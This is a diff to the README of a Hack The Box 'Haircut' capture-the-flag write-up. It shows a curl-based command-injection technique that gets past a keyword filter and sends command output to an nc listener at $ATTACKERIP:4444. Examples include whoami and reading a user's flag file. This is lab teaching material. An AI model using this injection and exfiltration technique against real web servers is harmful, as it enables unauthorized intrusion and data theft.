notsag-dev/htb-haircut/README.md

 /uploads (Status: 301)
 /exposed.php (Status: 200)
 ```

 The page `/exposed.php` has a text input, and when passing a URL it displays on screen the result of curling it.
-I tried to inject some command but some symbols/keywords were blocked e.g. &, | (pipe), python and nc.
+I tried to inject some command but some symbols/keywords were blocked e.g. &, ;, |, python and nc.
 Curl flags are not blocked, though.

-Checking `curl` man's page for ways to get more information about the system, I thought of sending information through body data of a curl request sent to a `nc` listener.
+Checking `curl` man's page for ways to get more information about the system or executing arbitrary code, I thought of sending information through body data of a curl request sent to a `nc` listener on the attacker machine.

 Set up listener from attacker:
 ```
 nc -lvp 4444
 ```

-Commands now can be executed like this, and the result of the executed command will be passed as data to the listener:
+Commands now can be executed from the input as follows, and the result of the executed command will be passed as data to the listener:
 ```
-curl $ATTACKERIP:4444 -d "`command goes here`"
+$ATTACKERIP:4444 -d "`command goes here`"
 ```

+So, the next couple of commands I'll list here will use this trick.

-So, if command is `whoami`, the ouput is `www-data`.
+If command is `whoami`, the listener will print `www-data`.

-It is possible to get the user flag already from here:
+It is possible to get the user flag already from here the same way:
 ```
 cat /home/maria/Desktop/user
 ```